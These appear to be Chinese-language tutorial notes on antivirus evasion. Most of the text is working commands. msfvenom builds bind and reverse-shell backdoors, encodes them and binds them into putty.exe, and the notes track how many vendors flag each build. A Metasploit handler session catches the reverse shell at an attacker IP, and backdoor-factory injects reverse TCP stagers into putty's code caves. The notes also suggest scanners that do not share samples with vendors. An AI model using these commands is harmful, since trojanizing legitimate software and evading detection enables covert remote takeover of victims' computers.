免杀技术

与防病毒厂商共享信息

VirusTotal

  https://www.virustotal.com/zh-cn

VirScan

  https://virscan.org

黑产在线查杀引擎

  https://nodistribute.com

  http://viruscheckmate.com扫描网站安全性

  http://onlinelinkscan.com

使用msf编码模块生成后门

  msfvenom -p windows/shell/bind_tcp LPORT=444 -f exe -o a.exe       21个厂商报毒

  增加编码模块

  msfvenom -a x86 -p windows/shell/bind_tcp LPORT=444 -e cmd/powershell_base64 -i 9 -f exe -o b.exe  20个厂商报毒

   使用编码后效果并不明显，还是很多厂商报毒

使用模板程序隐藏后门，效果比较好

  msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -f exe -o c.exe

  将后门绑定到putty中，这里用的是反弹shell 注意参数lhost地址填写的是攻击者的IP地址，绑定后putty会报废，如果不想破坏使用 -k 参数

  msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -k -f exe -o d.exe

  8个厂商报毒

+

payload: 在目标系统执行的代码或指令，使得获取shell

shellcode : 获取shell的code

shell             后门程序

reverser_tcp 反弹shell

bind_tcp      正向shell

meterpreter 更高级的shell，集成了很多脚本，更容易使用

 【meterpreter命令】

    getuid 当前用户信息

    getsystem 提权

    help 查看帮助

    screenshot

因为msf知名度太大了，做出的免杀指纹早已被杀毒厂商收录了

kali存放着windows下的执行程序目录

/usr/share/windows-binaries/

shellter 每次生成的后门程序代码都不同，动态变化的特征，难以用指纹匹配

后门利用

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.137.128
lhost => 192.168.137.128
msf exploit(multi/handler) > set lport 444
lport => 444
msf exploit(multi/handler) >

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.137.128  yes       The listen address
   LPORT     444              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.137.128:444

 

乱码将终端编码改成 gbk 或者 gb2312

shllter

veil-framework

backdoor生成的后门曾经很骚，没有一个杀软报毒，在黑帽大会秀了一波，现在不行了，不推荐使用

backdoor-factory 利用代码洞注入后门，不改变体积 code cave

backdoor-factory -f putty.exe -S　　　　　　检查是否支持注入后门

backdoor-factory -f putty.exe -c -l 100　　　　检查大于100字节的代码洞数量

backdoor-factory -f putty.exe -s show　　　　查看哪些payload可以用

普通注入模式（体积会变大，直接在程序后面加代码）

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a

 

大小对比

单代码洞注入（体积不会变，需要选择代码洞）

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a

最好选择代码洞比较大的，否则容易导致溢出，所以这里选择1，这里大小反而变小了，理论上应该不变的

 

使用的时候360杀软报毒了。在线监测有23个厂商报毒，效果不怎样，0day似的

多代码洞注入模式

backdoor-factory -f putty_no.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -J

要选多次代码洞，尽量选大的，不然要选很多次

利用：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LPORT 444

set LHOST 192.168.137.129